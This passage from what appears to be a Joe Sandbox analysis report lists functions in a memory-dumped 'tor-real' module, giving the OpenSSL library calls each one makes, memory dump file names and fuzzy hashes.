                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0B2AB9
                                                                              • Part of subcall function 6C0A5160: CRYPTO_zalloc.LIBCRYPTO-1_1 ref: 6C0A517B
                                                                              • Part of subcall function 6C0A5160: CRYPTO_THREAD_lock_new.LIBCRYPTO-1_1 ref: 6C0A51B4
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0B2AEF
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0B2B27
                                                                            • RAND_priv_bytes.LIBCRYPTO-1_1 ref: 6C0B2B49
                                                                            • RAND_priv_bytes.LIBCRYPTO-1_1 ref: 6C0B2B6A
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0B2BB7
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0B2BE8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: R_put_error$D_priv_bytesL_sk_new_null$D_lock_newE_newO_zallocP_get_digestbynameX509_$D_bytesD_run_onceF_parse_listH_newL_init_cryptoL_sk_freeL_sk_numM_newO_freeO_new_ex_dataO_secure_zalloc
                                                                            • String ID: $A
                                                                            • API String ID: 182319435-926879570
                                                                            • Opcode ID: 890b51fe29932b9742d513140990b0af228f166d34003ccae629a00ba2047c3e
                                                                            • Instruction ID: f81f98e6ac49194305d37536e51acf413f22643577b80f18397664c4f7e35b60
                                                                            • Opcode Fuzzy Hash: 890b51fe29932b9742d513140990b0af228f166d34003ccae629a00ba2047c3e
                                                                            • Instruction Fuzzy Hash: E4C10AB0109306DFE700DFA5C58939ABBE0BF44348F15892DD9989FB51DBB9D048CBA6
                                                                            Function 6C0A4670 Relevance: 47.6, APIs: 26, Strings: 1, Instructions: 362COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ASN1_item_d2i.LIBCRYPTO-1_1 ref: 6C0A46B0
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0A4735
                                                                            • ASN1_item_free.LIBCRYPTO-1_1 ref: 6C0A4745
                                                                            • ASN1_item_free.LIBCRYPTO-1_1 ref: 6C0A479A
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0A47D7
                                                                            • ASN1_item_free.LIBCRYPTO-1_1 ref: 6C0A4C1A
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0A4C4F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: N1_item_freeR_put_error$N1_item_d2i
                                                                            • String ID: g
                                                                            • API String ID: 3252097584-30677878
                                                                            • Opcode ID: d34967058f78d682ec462ae21b4ac7fdc9a68ed56484ecc2b1be903c1be79ba2
                                                                            • Instruction ID: 202a41949c4c058bf347b5afaf257320b179a3d8d94e969a68c936c638d9abb1
                                                                            • Opcode Fuzzy Hash: d34967058f78d682ec462ae21b4ac7fdc9a68ed56484ecc2b1be903c1be79ba2
                                                                            • Instruction Fuzzy Hash: 1B02E7B81097019FD700DFA5C08079ABBE0BF89308F54996EE8988FB55DB74E886CF51
                                                                            Function 6C0D25A0 Relevance: 44.3, APIs: 23, Strings: 2, Instructions: 558COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0D2775
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0D2790
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0D27A8
                                                                            • EVP_CIPHER_CTX_free.LIBCRYPTO-1_1 ref: 6C0D27D6
                                                                            • EVP_MD_CTX_free.LIBCRYPTO-1_1 ref: 6C0D27E1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_free$X_free
                                                                            • String ID: /$i
                                                                            • API String ID: 306345296-165077141
                                                                            • Opcode ID: 35c502d7a24f2507e2368adfd002b2389c5727963d247e047c13416b1b480e9a
                                                                            • Instruction ID: dbeef336a32323411479a5b70007bcebde9559e0ea6d517326ef0493ebb84157
                                                                            • Opcode Fuzzy Hash: 35c502d7a24f2507e2368adfd002b2389c5727963d247e047c13416b1b480e9a
                                                                            • Instruction Fuzzy Hash: FC4247B06097419FD710DF25C08475ABBF1BF89308F568A2DE8988BB51D734E989CF92
                                                                            Function 6C0CC000 Relevance: 44.1, APIs: 22, Strings: 3, Instructions: 373COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 0$D$P
                                                                            • API String ID: 0-2772689596
                                                                            • Opcode ID: e7557ddf51bd26ad997c0efd0308556874d6eb06f84693fb6c11ce64a975fe67
                                                                            • Instruction ID: 9cc7f60ddd024233f681a4d0147a349a2112b5d2671154971901254a9fa8a327
                                                                            • Opcode Fuzzy Hash: e7557ddf51bd26ad997c0efd0308556874d6eb06f84693fb6c11ce64a975fe67
                                                                            • Instruction Fuzzy Hash: 3B02DDB060A7019FE300EF69C58875FBBE0AF89748F51891DE8989B751D7B8D4498F83
                                                                            Function 6C0C0640 Relevance: 37.2, APIs: 19, Strings: 2, Instructions: 424COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • EVP_MD_size.LIBCRYPTO-1_1 ref: 6C0C0691
                                                                            • EVP_MD_CTX_new.LIBCRYPTO-1_1 ref: 6C0C06ED
                                                                            • EVP_DigestInit_ex.LIBCRYPTO-1_1 ref: 6C0C070B
                                                                            • EVP_DigestFinal_ex.LIBCRYPTO-1_1 ref: 6C0C072B
                                                                              • Part of subcall function 6C0E7060: EVP_PKEY_CTX_new_id.LIBCRYPTO-1_1 ref: 6C0E70C1
                                                                              • Part of subcall function 6C0E7060: EVP_PKEY_CTX_free.LIBCRYPTO-1_1 ref: 6C0E711F
                                                                            • OPENSSL_cleanse.LIBCRYPTO-1_1 ref: 6C0C0856
                                                                            • OPENSSL_cleanse.LIBCRYPTO-1_1 ref: 6C0C0866
                                                                            • EVP_PKEY_free.LIBCRYPTO-1_1 ref: 6C0C0872
                                                                            • EVP_MD_CTX_free.LIBCRYPTO-1_1 ref: 6C0C087A
                                                                              • Part of subcall function 6C0E79C0: EVP_PKEY_CTX_new_id.LIBCRYPTO-1_1 ref: 6C0E7A16
                                                                              • Part of subcall function 6C0E79C0: EVP_MD_size.LIBCRYPTO-1_1 ref: 6C0E7A28
                                                                              • Part of subcall function 6C0E79C0: EVP_MD_CTX_new.LIBCRYPTO-1_1 ref: 6C0E7A51
                                                                              • Part of subcall function 6C0E79C0: EVP_DigestInit_ex.LIBCRYPTO-1_1 ref: 6C0E7A6F
                                                                              • Part of subcall function 6C0E79C0: EVP_DigestFinal_ex.LIBCRYPTO-1_1 ref: 6C0E7A92
                                                                              • Part of subcall function 6C0E79C0: EVP_MD_CTX_free.LIBCRYPTO-1_1 ref: 6C0E7AA2
                                                                              • Part of subcall function 6C0E79C0: EVP_PKEY_derive_init.LIBCRYPTO-1_1 ref: 6C0E7B0D
                                                                              • Part of subcall function 6C0E79C0: EVP_PKEY_CTX_ctrl.LIBCRYPTO-1_1 ref: 6C0E7B41
                                                                              • Part of subcall function 6C0E79C0: EVP_PKEY_CTX_ctrl.LIBCRYPTO-1_1 ref: 6C0E7B71
                                                                            • EVP_DigestInit_ex.LIBCRYPTO-1_1 ref: 6C0C095F
                                                                            • EVP_DigestUpdate.LIBCRYPTO-1_1 ref: 6C0C0997
                                                                            • EVP_DigestFinal_ex.LIBCRYPTO-1_1 ref: 6C0C09BF
                                                                            • EVP_PKEY_new_raw_private_key.LIBCRYPTO-1_1 ref: 6C0C09EF
                                                                            • EVP_DigestSignInit.LIBCRYPTO-1_1 ref: 6C0C0A48
                                                                            • EVP_DigestUpdate.LIBCRYPTO-1_1 ref: 6C0C0A70
                                                                            • EVP_DigestSignFinal.LIBCRYPTO-1_1 ref: 6C0C0A94
                                                                            • CRYPTO_memcmp.LIBCRYPTO-1_1 ref: 6C0C0ADA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: Digest$Final_exInit_exX_free$D_sizeL_cleanseSignUpdateX_ctrlX_newX_new_id$FinalInitO_memcmpY_derive_initY_freeY_new_raw_private_key
                                                                            • String ID: D$P
                                                                            • API String ID: 4064739805-307317852
                                                                            • Opcode ID: 7625d29913794f39370ad0e794c3c0ef9fafa5d7ac0a1a529a2ea7489d997c88
                                                                            • Instruction ID: bece041ca83ffc0600c5ffbf16d81ad8580e8e6b96e3e29d1606efa7ea8d50a0
                                                                            • Opcode Fuzzy Hash: 7625d29913794f39370ad0e794c3c0ef9fafa5d7ac0a1a529a2ea7489d997c88
                                                                            • Instruction Fuzzy Hash: DB12B9B06093819FD350DF29C08475EBBF0AF89748F508A2DE8989B750D779E848CB83
                                                                            Function 6C0D49F0 Relevance: 35.3, APIs: 18, Strings: 2, Instructions: 346COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: R_flagsX_cipher
                                                                            • String ID: D$P
                                                                            • API String ID: 2855536855-307317852
                                                                            • Opcode ID: 0482a785b65c637ebf0ac00b7c1564f77aca49cb88549d5601b13ea2bab0b2d1
                                                                            • Instruction ID: 6022214f39aff00fd6d65cebfeab3bddde12f32152158dc61d8e27881d3daa47
                                                                            • Opcode Fuzzy Hash: 0482a785b65c637ebf0ac00b7c1564f77aca49cb88549d5601b13ea2bab0b2d1
                                                                            • Instruction Fuzzy Hash: 48F1EDB0609301AFD310DF69C48475BBBE0BF88718F528A2DE4A89B750D775E949CF92
                                                                            Function 6C0C26A3 Relevance: 30.4, APIs: 15, Strings: 2, Instructions: 688stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: L_cleanseO_freeO_memdupstrcmpstrlen
                                                                            • String ID: D$P
                                                                            • API String ID: 1317467310-307317852
                                                                            • Opcode ID: 3266a2679ff57d5ec4d594ac5f2f8a4109ae84ba9e8686575a4f088a04e0ef1f
                                                                            • Instruction ID: a3fdb4c81005e635dfff1ee4c2284d1332a23fc650cc09d317b333fbb91afdc5
                                                                            • Opcode Fuzzy Hash: 3266a2679ff57d5ec4d594ac5f2f8a4109ae84ba9e8686575a4f088a04e0ef1f
                                                                            • Instruction Fuzzy Hash: 616201B06093019FE710DF25C58879EBBE0BF84708F50992DE9989BA40DBB5D949CF93
                                                                            Function 6C0CEA50 Relevance: 30.1, APIs: 14, Strings: 3, Instructions: 395COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • OPENSSL_sk_new_null.LIBCRYPTO-1_1 ref: 6C0CEA6A
                                                                            • X509_free.LIBCRYPTO-1_1 ref: 6C0CEB04
                                                                            • OPENSSL_sk_pop_free.LIBCRYPTO-1_1 ref: 6C0CEB14
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: L_sk_new_nullL_sk_pop_freeX509_free
                                                                            • String ID: /$@$A
                                                                            • API String ID: 1383825558-709520065
                                                                            • Opcode ID: d4588fc526d6880e77d8a2ae0247bc140b1aa5fc6506160a995b0d262b99f629
                                                                            • Instruction ID: 673b1ae788281e7562dcc11211f870675fbaaead1faf99f25c9b473d453366f8
                                                                            • Opcode Fuzzy Hash: d4588fc526d6880e77d8a2ae0247bc140b1aa5fc6506160a995b0d262b99f629
                                                                            • Instruction Fuzzy Hash: 2D02E0B06093018FD304DF29C58575EBBE1BF89748F60892DE4A88B651DB79E949CF83
                                                                            Function 6C0D2960 Relevance: 28.4, APIs: 12, Strings: 4, Instructions: 370COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0D29A6
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0D29C1
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0D29D9
                                                                            • EVP_CIPHER_CTX_free.LIBCRYPTO-1_1 ref: 6C0D2A38
                                                                            • EVP_MD_CTX_free.LIBCRYPTO-1_1 ref: 6C0D2A43
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_free$X_free
                                                                            • String ID: /$g$i$i
                                                                            • API String ID: 306345296-3194391274
                                                                            • Opcode ID: 936534f4ea075276f4fab7cc5e3a3b60479af7e6fd9db8174d9fce575eb5c86d
                                                                            • Instruction ID: 13b5ceba65137cb15f0b806eb14f82f96b266f6ce1a387575014f0ba40a8b7aa
                                                                            • Opcode Fuzzy Hash: 936534f4ea075276f4fab7cc5e3a3b60479af7e6fd9db8174d9fce575eb5c86d
                                                                            • Instruction Fuzzy Hash: F7021EB06087418FD710DF25C08476ABBF0BF89348F558A6DE8D88B761D774E989CB92
                                                                            Function 6C0EA0C0 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 144stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SRP_Verify_B_mod_N.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C0D0540), ref: 6C0EA0DE
                                                                            • SRP_Calc_u.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C0D0540), ref: 6C0EA108
                                                                            • SRP_Calc_x.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C0D0540), ref: 6C0EA155
                                                                            • SRP_Calc_client_key.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C0D0540), ref: 6C0EA199
                                                                            • BN_num_bits.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C0D0540), ref: 6C0EA1AB
                                                                            • CRYPTO_malloc.LIBCRYPTO-1_1 ref: 6C0EA1D3
                                                                            • BN_bn2bin.LIBCRYPTO-1_1 ref: 6C0EA1EB
                                                                              • Part of subcall function 6C0A3510: CRYPTO_malloc.LIBCRYPTO-1_1 ref: 6C0A356C
                                                                              • Part of subcall function 6C0A3510: memcpy.MSVCRT ref: 6C0A359D
                                                                              • Part of subcall function 6C0A3510: memcpy.MSVCRT ref: 6C0A35C9
                                                                              • Part of subcall function 6C0A3510: CRYPTO_clear_free.LIBCRYPTO-1_1 ref: 6C0A35EE
                                                                              • Part of subcall function 6C0A3510: CRYPTO_clear_free.LIBCRYPTO-1_1 ref: 6C0A3660
                                                                              • Part of subcall function 6C0A3510: CRYPTO_clear_free.LIBCRYPTO-1_1 ref: 6C0A3698
                                                                            • BN_clear_free.LIBCRYPTO-1_1 ref: 6C0EA215
                                                                            • BN_clear_free.LIBCRYPTO-1_1 ref: 6C0EA221
                                                                            • strlen.MSVCRT ref: 6C0EA229
                                                                            • CRYPTO_clear_free.LIBCRYPTO-1_1 ref: 6C0EA245
                                                                            • BN_clear_free.LIBCRYPTO-1_1 ref: 6C0EA24D
                                                                            • BN_clear_free.LIBCRYPTO-1_1 ref: 6C0EA29E
                                                                            • BN_clear_free.LIBCRYPTO-1_1 ref: 6C0EA2AA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: N_clear_free$O_clear_free$O_mallocmemcpy$B_mod_Calc_client_keyCalc_uCalc_xN_bn2binN_num_bitsVerify_strlen
                                                                            • String ID: A$P
                                                                            • API String ID: 1650908724-345673399
                                                                            • Opcode ID: b0729bf3fce373b43d6f5a45bed5a75b88a7250f115a0f3344c47dbd0ba81c79
                                                                            • Instruction ID: 3bfcaac3b895f5abf0e993e7b5c21ab3b785f489ac134288707c45f0f55c4fc3
                                                                            • Opcode Fuzzy Hash: b0729bf3fce373b43d6f5a45bed5a75b88a7250f115a0f3344c47dbd0ba81c79
                                                                            • Instruction Fuzzy Hash: FF61FFB06497019FD700DF69C48475EBBE0BF88358F10892DE8A89B781DB79D948CF52
                                                                            Function 6C09E040 Relevance: 26.6, APIs: 12, Strings: 3, Instructions: 355COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • EVP_CIPHER_CTX_iv_length.LIBCRYPTO-1_1 ref: 6C09E0B7
                                                                            • memcpy.MSVCRT ref: 6C09E140
                                                                            • EVP_CipherInit_ex.LIBCRYPTO-1_1 ref: 6C09E1E2
                                                                            • EVP_CIPHER_CTX_ctrl.LIBCRYPTO-1_1 ref: 6C09E21B
                                                                            • EVP_CipherUpdate.LIBCRYPTO-1_1 ref: 6C09E315
                                                                            • EVP_CipherUpdate.LIBCRYPTO-1_1 ref: 6C09E342
                                                                            • EVP_CipherFinal_ex.LIBCRYPTO-1_1 ref: 6C09E365
                                                                            • EVP_CIPHER_CTX_ctrl.LIBCRYPTO-1_1 ref: 6C09E3B4
                                                                            • memmove.MSVCRT ref: 6C09E461
                                                                            • EVP_CipherUpdate.LIBCRYPTO-1_1 ref: 6C09E638
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
